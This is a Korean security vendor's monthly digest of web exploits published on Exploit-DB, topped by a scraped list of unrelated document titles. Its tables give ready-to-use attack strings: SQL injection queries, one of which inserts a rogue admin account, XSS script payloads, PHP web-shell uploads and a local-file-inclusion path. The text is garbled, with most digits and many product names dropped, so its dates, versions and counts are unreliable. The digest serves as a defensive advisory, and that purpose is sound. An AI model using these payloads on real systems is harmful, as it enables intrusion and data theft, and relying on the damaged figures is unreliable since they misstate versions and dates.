EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

Secure Programming Lecture1 : Introduction

제목 레이아웃

3장

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

105È£4fš

³»Áö

1 01 [ ] [ ] plus 002

1217 WebTrafMon II

UNIST_교원 홈페이지 관리자_Manual_V1.0

10.ppt

C H A P T E R 2

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

MySQL-Ch10

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

3 S Q L A n t i p a t t e r n s Trees/intro/parent.sql CREATE TABLE Comments ( comment_id SERIAL PRIMARY KEY, parent_id BIGINT UNSIGNED, comment TEXT

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

vm-웨어-01장

Sena Device Server Serial/IP TM Version

CD-RW_Advanced.PDF

I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r

Connection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET

Microsoft Word - junior.docx


°øÁÖ´ëÇб³Ãѵ¿Ã¢È¸º¸ 63È£

DocsPin_Korean.pages

10김묘선

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

FileMaker 15 ODBC 및 JDBC 설명서

0. 들어가기 전

FileMaker ODBC 및 JDBC 가이드

< FC1A6BEC8BFE4C3BBBCAD2E687770>

MySQL-Ch05

FileMaker ODBC and JDBC Guide

Observational Determinism for Concurrent Program Security

untitled

PowerPoint Presentation

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

PowerPoint Template

untitled

Backup Exec

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA

DBMS & SQL Server Installation Database Laboratory

bn2019_2

Cache_cny.ppt [읽기 전용]

06/09-101È£ä263»Áö

04/07-08(È£ä263»Áö

PowerPoint 프레젠테이션

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including any operat

내지무인화_

BEef 사용법.pages

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

Microsoft Word - Windows_apahce_php_CUBRID2008

초보자를 위한 ADO 21일 완성

IDA 5.x Manual hwp

RUCK2015_Gruter_public

CMS-내지(서진이)

NoSQL

<49534F C0CEC1F520BBE7C8C4BDC9BBE720C4C1BCB3C6C320B9D D20BDC3BDBAC5DB20B0EDB5B5C8AD20C1A6BEC8BFE4C3BBBCAD2E687770>

FileMaker ODBC and JDBC Guide

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

uFOCS

2011년 10월 초판 c 2011 Sony Corporation. All rights reserved. 서면 허가 없이 전체 또는 일부를 복제하는 것을 금합니다. 기능 및 규격은 통보 없이 변경될 수 있습니다. Sony와 Sony 로고는 Sony의 상표입니다. G L

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

untitled

#한국사문제7회4급

untitled

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

RolexSweep Team Team : RolexSweep (lokihardt, hellsonic, hkkiw0823, dakuo) 페이지 1 / 25

3ÆÄÆ®-14

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

게시판 스팸 실시간 차단 시스템

02118.hwp

how_2_write_Exploit_4_the_MSF_v3.x.hwp

5장 SQL 언어 Part II

@OneToOne(cascade = = "addr_id") private Addr addr; public Emp(String ename, Addr addr) { this.ename = ename; this.a

Transcription:

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다. 분석된 SQL Injection 공격과 XSS 공격은비교적낮은공격난이도가요구되는쉽게시도가능한공격이었던반면, 높은위험도를지니고있어공격성공시치명적인피해를입을수있는것으로확인되었습니다. 이는단순한공격패턴에도쉽게웹서버의정보가유출되거나관리자권한이탈취되어웹사이트가악용될수있음을의미하기때문에, 보안담당자는 SQL Injection 과 XSS 에대한공격대응에조금더주의를기울이는것이필요합니다. 금월에는특히다양한종류의 (Content Management System) 에서 XSS, SQL Injection 등이보고되었습니다. 를비롯한해당보고서에포함되어있는 정보를확인하여문제가되는 를사용하고있고해당을보유하고있다고판단된다면신속하게보안패치를수행하여각에대응하는것을권고드립니다.. 별보고개수 보고개수 XSS 8 SQL Injection 8 File Upload LFI 총합계 9 0 0 0 0 0 별보고개수 9 8 8 XSS SQL Injection File Upload LFI 총합계. 위험도별분류 위험도 보고개수 백분율 상 8 6.% 중.8% 하 0 0.00% 합계 9 00.00% 위험도별분류 8 상 중. 공격난이도별현황공격난이도 보고개수 백분율 상.6% 중 0.77% 하 6 66.67% 총합계 9 00.00% 공격난이도별현황 상 중 6 하. 주요소프트웨어별발생현황소프트웨어이름 Analyzer WordPress Shopping Cart PHP Webquest NPDS Revolution- Microweber Mangallam e ServiceDesk Plus ecommercemajor Barracuda Networks Cloud 총합계 보고개수 9 주요소프트웨어별발생현황 Analyzer WordPress Shopping Cart PHP Webquest NPDS Revolution- Microweber Mangallam ** 개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 786 XSS 하 중.0. - credential 786 XSS 하 중.0. - inventories 786 XSS 하 중.0. - projects 786 XSS 하 중.0. - schedules 786 XSS 하 중.0. - permissions

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 0-0-0 670 SQL Injection 중상 Absolut.7 - masection.php SQL Injection /admin/masection.php?&username=admin&session= c8d7ebc9b9ba7dbeb9bea6c7&sectionid=%7 +and+=+union+select+,version%8%9,,,,6+--+.7 0-0-0 670 SQL Injection 중상 Absolut.7 - edituser.php SQL Injection /admin/edituser.php?username=admin&session=c8d7ebc9 b9ba7dbeb9bea6c7&userid=%7+and+=+ union+select+,user%8%9,,version%8%9,,datab ase%8%9,7,8,9+--+.7 0-0-0 670 SQL Injection 하상 Absolut.7 - admin.php SQL Injection /admin/admin.php?username=admin%7+and+substring %8user%8%9,,%9=%7root%7+-- +&session=c8d7ebc9b9ba7dbeb9bea6c7*.7 0-0-0 670 SQL Injection 중상 Absolut.7 - marelated.php SQL Injection /admin/marelated.php?username=user&session=ae 9000d8707c897e87d09b6&articleID=0&title={s ome_title}' and = union select,version(),,,,6,7,8,9,0,, --.7 0-0-0 69 XSS 하중.0 - add XSS POST /demo/games/add HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f.0 ------WebKitFormBoundaryhqOjdXjGMh7GyfIw Content-Disposition: form-data; name="val[content]" <script>document.body.innerhtml="your text here"</script><noscript> ------WebKitFormBoundaryhqOjdXjGMh7GyfIw 0-0-06 70 XSS 하중 add XSS POST /adaptcms/admin/categories/add HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f _method=post&data[_token][key]=8f8ee97800bb 06d7c69bcade60&data[Category][title]="><scr ipt>alert();</script>&data[_token][fields]=dece 076bf8f7e776fa7966:&data[_Token][unlocke d]= 0-0-06 70 XSS 하중 - ajax_fields XSS POST /adaptcms/admin/fields/ajax_fields/ HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f data[field][category_id]=&data[field][title]="><script>aler t();</script>&data[field][description]= POST /adaptcms/admin/tools/create_theme?finish=true HTTP/. 0-0-06 70 XSS 하중 - create_theme XSS User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) Content-Type: application/x-www-form-urlencoded; {"basicinfo":{"name":"<script>alert();</script>"}} 0-0-06 70 XSS 하중 new XSS POST /adaptcms/forums/off-topic/new HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f _method=post&data[_token][key]=c87b6 77ae8dbca8a7f9dba&data[ForumTopic][subject]=" ><script>alert();</script>&data[forumtopic][content]=<p >testingcontent</p>&data[forumtopic][topic_type]=topic &data[forumtopic][forum_id]=&data[_token][fields]=bcf f0f6eb0d877fcdd8c9f69a:forumtopic. forum_id ForumTopic.topic_type&data[_Token][unlocked] = 0-0-07 7 SQL Injection 중상 v..6.0 - main.php SQL Injection /backend/main.php?area=con_configcat&idcat=' and ''='' union select version(),user(),, -- &idtplconf=0 v..6.0

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 0-0-07 7 SQL Injection 중상 v..6.0 - main.php SQL Injection /backend/main.php?area=plug&idclient=' and ''='' union select,version(),user(),,database(),6,7,8,9,0,,,, -- v..6.0 0-0-07 70 SQL Injection 하상 Microweber 0.9 - category: SQL Injection /shop/category: sleep(0) Microweber Microweber 0.9 0-0-08 70 File Upload 하중 WordPress Shopping Cart.0. - banneruploaderscript.php File Upload POST /wp-content/plugins/wpeasycart/inc/amfphp/administration/banneruploaderscript. php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f WordPress Shopping Cart WordPress Shopping Cart.0. -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream <?php echo?> -----------------------------7dd009908f-- 0-0- 767 XSS 하중. - index.php XSS /admin/index.php?jak_username="><script>alert()</script >. 0-0- 767 XSS 하중. - dialog.php XSS /js/editor/plugins/filema/dialog.php?type="><script> alert()</script>. 0-0- 767 SQL Injection 하상. - index.php SQL Injection /admin/index.php?p=logs&sp=delete&ssp= and = --. 0-0- 786 XSS 하중.0. - credential /api/v/credentials?order_by="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - inventories /api/v/inventories?order_by="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - projects /api/v/projects?order_by="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - schedules /api/v/schedules?next_run="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - permissions /api/v/users//permissions?order_by="><script>alert('xss') </script>.0. 0-0- 87 SQL Injection 하상.0. - profile.functions.php SQL Injection POST /articlefr/register/ HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f.0. username= and = &email=test@itas.vn&name=test&password=&su bmit=register 0-0- 890 SQL Injection 중상 e ServiceDesk Plus 9.0 - CreateReportTable.jsp SQL Injection /reports/createreporttable.jsp?site=0 AND UNION ALL SELECT user(),null,null,null,null e ServiceDesk Plus e ServiceDesk Plus 9.0

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 0-0-6 9 SQL Injection 중상 POST /sis-ui/authenticate Host : Accept:*/* AppFire-Format-Version :.0 AppFire-Charset: UTF-6LE Content-Type : application/x-appfire User-Agent : Java/.7.0_ Data-Format=text/plain Data-Type=properties Data-Length=000 ai=&ha=example.com&nun=aaaaaaaaaaaaaa'; INSERT INTO USR (RID, USERNAME,PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (0, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP9JBtGy6ZvuZnkAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '0-09- 07::09', '0-09- 07::', '', '0', '0', 'NDSNcDdDb89eCIURLriEOL/RwZXlRuWxyQpyGR/tfWt 8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZKuq snkchwxx+agauawctdii7zxjoqafdaobasud867 mmeuxia0cezj0gcanwvnoerhqwttto='); -- ''..9 미만버전 0-0-6 9 XSS 하중 - SSO-Error.jsp XSS %Fwebui%FKhaki_docs%FSSO- Error.jsp%FErrorMsg%D%Cscript%Ealert(%7xss% 7)%C%Fscript%E%0A..9 미만버전 0-0-6 9 XSS 하중 - WCUnsupportedClass.jsp XSS %Fwebui%Fadmin%FWCUnsupportedClass.jsp%Fcl assname%d%cscript%ealert(%7xss%7)%c%f script%e..9 미만버전 0-0-6 9 SQL Injection 중상.0.-alpha - admin.php SQL Injection /admin.php?type=site&action=update&p=+and+=+uni on+select+,version%8%9,,+--+.0.-alpha 0-0-6 9 XSS 하중.0.-alpha - admin.php XSS /admin.php?type=search&action=%cscript%ealert%8 document.cookie%9%c/script%e.0.-alpha 0-0-6 9 SQL Injection 중상 - offerringads SQL Injection //classifieds/offerringads?controller=displayads&view=displayads&task=viewad& id=+and+=+union+select+,version%8%9,,+--+ 0-0-6 9 XSS 하중 - classifieds XSS //classifieds?view=displayads7edb"onl oad%d"alert()"87dd&layout=offerring&controller=disp layads&adtype= 0-0-6 90 LFI 하중 Analyzer 9.0 - index.do LFI /event/index.do?helpp=userreport&overview=true&tab= report&url=../../web-inf/web.xml%f Analyzer Analyzer 9.0 0-0-6 90 XSS 하중 Analyzer 9.0 - index.do LFI /event/index.do?helpp=userreport&overview=true&tab= report&url=userreport'%()%6%<ahy><script%0 >prompt(97)</script> Analyzer Analyzer 9.0 0-0-6 906 SQL Injection 하상 PHP Webquest.6 /phpwq/webquest/soporte_horizontal_w.php?id_actividad =8&id_pagina=%7%0and%0=-- PHP Webquest PHP Webquest.6 0-0-6 900 XSS 하중 0-0-6 899 SQL Injection 중상 Barracuda Networks Cloud Series - / XSS Mangallam - news_view.php SQL Injection 0-0- 878 SQL Injection 중상 ecommercemajor /<iframe src=a>%0%0%0%0\"><iframe src=http://vuln-lab.com onload=alert("vl") < /news_view.php?newsid=- +and+=+union+select+,version%8%9,,+--+ /ecommercemajor/product.php?productbycat=+and+= +union+select+,version%8%9,,+--+ Barracuda Networks Cloud Mangallam ecommercem ajor Barracuda Networks Cloud Series Mangallam ecommercem ajor 0-0- 88 File Upload 하중.0. - videouploader.php File Upload POST /articlefr/dashboard/videouploader.php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f -----------------------------776700070 Content-Disposition: form-data; name="myvideo"; filename="img.php" Content-Type: image/gif.0. <?php phpinfo();?> -----------------------------776700070

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /npds/search.php HTTP/. 0-0- 90 SQL Injection 중 상 NPDS Revolution- - NPDS NPDS search.php SQL Injection User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows Revolution- Revolution- NT 6.; WOW6; Trident/6.0) Content-Type: application/x-www-form-urlencoded query=")and benchmark(0000000,sha())- /vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid = UNION ALL SELECT userfield.*, usertextfield.*, user.*, usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, concat(user.password, 0xa, user.salt) AS avatarpath, NOT ISNULL(customavatar.userid) AS hascustomavatar, customavatar.dateline AS avatardateline, 0-0-0 860 SQL Injection 상상.. - vbsso.php SQL Injection customavatar.width AS avwidth, customavatar.height AS avheight, customavatar.height_thumb AS avheight_thumb, customavatar.width_thumb AS avwidth_thumb, vbulletin vbsso Single Sign-On vbulletin vbsso Single Sign-On.. customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN usertextfield AS usertextfield ON (usertextfield.userid = user.userid) LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT